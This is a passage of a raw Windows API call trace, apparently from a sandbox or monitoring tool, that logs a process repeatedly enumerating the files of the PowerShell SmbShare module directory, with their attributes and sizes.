dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0177.810] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0177.810] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0177.810] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0177.810] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0177.811] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.812] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0177.812] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0177.812] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.813] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0177.813] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0177.813] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.814] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.814] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.814] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0177.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0177.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0177.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0177.817] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0177.817] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.817] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0177.817] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.817] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.818] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0177.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.818] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.819] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0177.819] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0177.819] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.820] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.820] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.820] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0177.913] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0177.913] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: 